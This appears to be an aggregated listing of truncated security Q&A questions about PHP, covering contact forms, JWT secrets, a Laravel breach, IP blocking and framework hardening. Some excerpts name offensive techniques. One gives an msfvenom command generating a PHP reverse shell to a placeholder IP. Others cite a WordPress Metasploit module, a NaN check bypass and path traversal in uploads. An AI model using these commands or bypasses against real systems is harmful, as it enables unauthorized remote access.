Collaborate Disseminate
I have a continuously upgraded and minimalistically developed LAMP environment with an all-core CMS website.
The main reason that my contact form in my website is backend (PHP) instead frontend (vanilla JavaScript) is to protect my email a… Continue reading How to protect an email address in a php file?
is it possibile to bypass some check like this:
$amount = (int)$_REQUEST[‘amount’];
if (!($amount >= 10)) {
// authorize
}
by sending a NaN value to amount param?
like: https://www.site.com/?amount?<NaN>
and if it is, how can … Continue reading Is it possibile to send NaN value to a param to bypass (PHP)?
I’m building an app where the client will be issued a JWT. The JWT will be passed to my API for every request. I’m leaning in the direction of hosting my webserver and SQL server separately from each other using EC2 and RDS.
SECRET = bin2h… Continue reading JSON Web Token secret storage
I recently had a breach on my site (laravel), i got aware of it after i tried to pull the code from github and found out that some files were modified.
files modified were mostly storage – logs/cache and index.php had error_reporting(E_ALL… Continue reading Is there any way an attacker can access the server and modify the site (php) code?
So. I am having some issues at metasploit.
I am trying to exploit
exploit/multi/http/wp_crop_rce.
I am using Docker, in order to install wordpress version: 4.8.9.
PHP 7.2.12 (cli) (built: Nov 28 2018 22:58:16) ( NTS )
Copyright (c) 1997-20… Continue reading – Exploit aborted due to failure: not-found: Can’t find base64 decode on target
I am using this script to upload file to the system with apache2 as server and php7.
If I provide filename as ../../../../tmp/data.png of uploaded file, then also the file gets uploaded to /var/up/data.png.
<?php … Continue reading Why does file traversal not working in this PHP file upload code?
I created a php reverse shell using msfvenom utility like:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<MY_IP> LHOST=4444 -f raw > reverse_shell.php
And I created a listener using msfconsole using multi/handler. I uploaded the … Continue reading PHP reverse shell is not responding back [closed]
I am planning to create a system, but I still have some questions about security. I would like to know if it makes sense to block unauthorized users from accessing the system, through the ip, using a PHP script and also firewall rules by A… Continue reading Does it make sense to have the application block users by IP as well as the firewalls?
I am working on the auto-routing functionality of Codeigniter 4 and I’d like to test it by sending some nasty exploit-type HTTPS requests to make sure it properly resists mischief. E.g., request a uri with .. in the path to see if we might… Continue reading How to create custom exploit https requests to test a PHP framework
Frontend communicates to backend.
I am a developer of frontend and backend.
I want to protect my app (prohibit end user from using my app without paying).
The only thing I have in mind is to have some middle point, some my server.
Frontend… Continue reading How to protect client server app if both: client and server – located on client side?